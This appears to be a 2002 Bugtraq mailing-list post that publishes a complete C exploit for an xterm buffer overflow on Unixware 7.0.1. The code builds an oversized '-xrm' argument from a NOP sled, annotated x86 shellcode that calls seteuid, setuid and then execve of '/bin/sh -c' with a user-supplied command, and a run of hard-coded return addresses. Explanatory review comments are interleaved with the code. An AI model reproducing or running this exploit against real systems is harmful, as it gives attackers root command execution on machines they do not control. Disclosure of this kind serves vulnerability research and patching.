xterm exploit in Unixware 7.0.1
Date: 8 Jan 2002 06:08:40 -0000
From: jG gM <jggm@mail.com>
To: bugtraq@securityfocus.com
Subject: xterm exploit in Unixware 7.0.1
Hi.
I'm jGgM.
Here is the xterm exploit code for Unixware 7.0.1.
http://www.netemperor.com/
Mail: jggm@mail.com
--------------------------------------------------------
/*
* xterm buffer overflow by jGgM
* http://www.netemperor.com/en/
* EMail: jggm@mail.com
*
*/
#include <stdio.h>
#include <stdlib.h>
/*
 * Payload bytes that main() embeds in the oversized "-xrm" argument.
 * The author's per-line annotations give the x86 disassembly; the number
 * in the leading comment of each line is the byte offset within the string.
 *
 * Layout, as the annotated instructions show:
 *   - offset 0 jumps to the "springboard" at 97, whose call back to "start"
 *     leaves the address of the data area (offset 102) on the stack, which
 *     "popl %esi" at 10 loads into %esi;
 *   - offsets 13 and 16 write zero bytes at %esi-0x63 and %esi-0x5e, i.e.
 *     over the 0xff operand bytes of the lcall at offset 2, so the stored
 *     bytes differ from the "lcall 0x7,0x0" the comment describes until the
 *     code has run;
 *   - three calls through the lcall stub, labelled seteuid, setuid and
 *     execve by the author;
 *   - a data area of four 4-byte words followed by "/bin/sh" and "-c", each
 *     terminated by 0xff rather than 0x00.
 *
 * The word at offset 102 (LEN in main) is overwritten at runtime by main()
 * with the negated command length; "negl %ebx" at offset 51 turns it back
 * into a positive length.  main() measures this string with strlen(), so
 * the copy it makes ends at the first 0x00 byte.
 */
char shell[] =
/* 0 */ "\xeb\x5f" /* jmp springboard */
/* syscall: */
/* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 (operand bytes patched at runtime, see offsets 13 and 16) */
/* 9 */ "\xc3" /* ret */
/* start: */
/* 10 */ "\x5e" /* popl %esi -- address of the data area */
/* 11 */ "\x31\xc0" /* xor %eax,%eax */
/* 13 */ "\x89\x46\x9d" /* movl %eax,-0x63(%esi) */
/* 16 */ "\x88\x46\xa2" /* movb %al,-0x5e(%esi) */
/* seteuid: */
/* 19 */ "\x31\xc0" /* xor %eax,%eax */
/* 21 */ "\x50" /* pushl %eax */
/* 22 */ "\xb0\x8d" /* movb $0x8d,%al */
/* 24 */ "\xe8\xe5\xff\xff\xff" /* call syscall */
/* 29 */ "\x83\xc4\x04" /* addl $0x4,%esp */
/* setuid: */
/* 32 */ "\x31\xc0" /* xor %eax,%eax */
/* 34 */ "\x50" /* pushl %eax */
/* 35 */ "\xb0\x17" /* movb $0x17,%al */
/* 37 */ "\xe8\xd8\xff\xff\xff" /* call syscall */
/* 42 */ "\x83\xc4\x04" /* addl $0x4,%esp */
/* execve: */
/* 45 */ "\x31\xc0" /* xor %eax,%eax */
/* 47 */ "\x50" /* pushl %eax */
/* 48 */ "\x56" /* pushl %esi */
/* 49 */ "\x8b\x1e" /* movl (%esi),%ebx -- the word main() patched with -len */
/* 51 */ "\xf7\xdb" /* negl %ebx */
/* 53 */ "\x89\xf7" /* movl %esi,%edi */
/* 55 */ "\x83\xc7\x10" /* addl $0x10,%edi */
/* 58 */ "\x57" /* pushl %edi */
/* 59 */ "\x89\x3e" /* movl %edi,(%esi) */
/* 61 */ "\x83\xc7\x08" /* addl $0x8,%edi */
/* 64 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 67 */ "\x89\x7e\x04" /* movl %edi,0x4(%esi) */
/* 70 */ "\x83\xc7\x03" /* addl $0x3,%edi */
/* 73 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 76 */ "\x89\x7e\x08" /* movl %edi,0x8(%esi) */
/* 79 */ "\x01\xdf" /* addl %ebx,%edi */
/* 81 */ "\x88\x47\xff" /* movb %al,-0x1(%edi) */
/* 84 */ "\x89\x46\x0c" /* movl %eax,0xc(%esi) */
/* 87 */ "\xb0\x3b" /* movb $0x3b,%al */
/* 89 */ "\xe8\xa4\xff\xff\xff" /* call syscall */
/* 94 */ "\x83\xc4\x0c" /* addl $0xc,%esp */
/* springboard: */
/* 97 */ "\xe8\xa4\xff\xff\xff" /* call start */
/* data: */
/* 102 */ "\xff\xff\xff\xff" /* DATA -- overwritten by main() with -(strlen(command)+1) */
/* 106 */ "\xff\xff\xff\xff" /* DATA */
/* 110 */ "\xff\xff\xff\xff" /* DATA */
/* 114 */ "\xff\xff\xff\xff" /* DATA */
/* 118 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA -- "/bin/sh" then 0xff */
/* 126 */ "\x2d\x63\xff"; /* DATA -- "-c" then 0xff; main() appends the command right after this */
#define NOP 0x90         /* single-byte x86 nop; main() fills the sled with it */
#define LEN 102          /* offset in shell[] of the DATA word main() patches with -len */
#define BUFFER_SIZE 1052 /* bytes of sled + shell[] + command ahead of the return addresses */
#define RET_LENGTH 12    /* number of 4-byte copies of ret appended after BUFFER_SIZE */
/*
 * Entry point.  argv[1] is the command string that is appended after
 * shell[]; argv[2] is an optional decimal offset subtracted from the
 * hard-coded return address.  Builds one argument of BUFFER_SIZE bytes
 * (NOP sled, then shell[], then the command, positioned so they end at
 * BUFFER_SIZE) followed by RET_LENGTH copies of ret, and passes it to
 * /usr/X/bin/xterm as the value of "-xrm".  Returns to the caller only
 * if the exec itself fails.
 *
 * NOTE(review): strlen() and execl() are used without <string.h> or
 * <unistd.h>, so under C89 they are implicitly declared; this is also
 * why strlen() results are kept in int rather than size_t.
 */
int
main(int argc, char *argv[])
{
char start_addr[4];                              /* only its address is taken, for start_address */
char buffer[BUFFER_SIZE+(RET_LENGTH*4)+1];       /* sled + payload + command, RET_LENGTH words, NUL */
char *command;
long offset, ret, start_address;
int len, x, y, shell_start;                      /* shell_start is declared but never used */
if(argc > 3 || argc < 2) {
fprintf(stderr, "Usage: %s [command] [offset]\n",
argv[0]);
exit(1);
} // end of if..
command = argv[1];
/* atol() reports no errors: a non-numeric argv[2] silently yields 0. */
if(argc == 3) offset = atol(argv[2]);
else offset = 0;
/* Store -(strlen(command)+1) little-endian into the DATA word at
 * shell[LEN]; the payload's "negl %ebx" (offset 51 in shell[]) recovers
 * the positive length at runtime. */
len = strlen(command);
len++;
len = -len;
shell[LEN+0] = (len >> 0) & 0xff;
shell[LEN+1] = (len >> 8) & 0xff;
shell[LEN+2] = (len >> 16) & 0xff;
shell[LEN+3] = (len >> 24) & 0xff;
/* start_address is only printed below; the two commented-out lines are
 * the author's earlier attempts to derive ret from it.  The value finally
 * used is a fixed constant minus the user-supplied offset. */
start_address = (long)&start_addr;
//ret = start_address - offset;
//ret = start_address - 1080 - offset;
ret = 0x8047910 - offset; // this is very very stupid
/* Fill the first BUFFER_SIZE bytes with NOPs, then place shell[] and the
 * command so that the command's last byte lands at BUFFER_SIZE-1.  Both
 * lengths come from strlen(), so shell[] is measured up to its first
 * 0x00 byte. */
for(x=0; x<BUFFER_SIZE; x++) buffer[x] = NOP;
x = BUFFER_SIZE - strlen(command) - strlen
(shell);
for(y=0; y<strlen(shell); y++)
buffer[x++] = shell[y];
for(y=0; y<strlen(command); y++)
buffer[x++] = command[y];
/* Append RET_LENGTH copies of ret.  The int* store through a char array
 * is unaligned and truncates long to int; it assumes a 32-bit target
 * where both types are 4 bytes, which the 32-bit x86 payload already
 * implies. */
for(y=0; y<RET_LENGTH; y++, x += 4)
*((int *)&buffer[x]) = ret;
buffer[x] = 0x00;
/* Format specifiers do not match the argument types ("%x"/"%d" with
 * long, "%d" with the size_t from strlen()); this only works by accident
 * of the ILP32 ABI. */
printf("start_address = 0x%x\n", start_address);
printf("ret = 0x%x,\n", ret);
printf("offset = %d\n", offset);
printf("command = %s\n", command);
printf("buffer size = %d\n", strlen(buffer));
/* execl() replaces the process on success and returns only on failure. */
execl("/usr/X/bin/xterm", "xterm", "-xrm", buffer,
NULL);
printf("exec failed\n");
/* No return statement: after a failed exec the exit status is unspecified
 * under C89 (0 under C99). */
}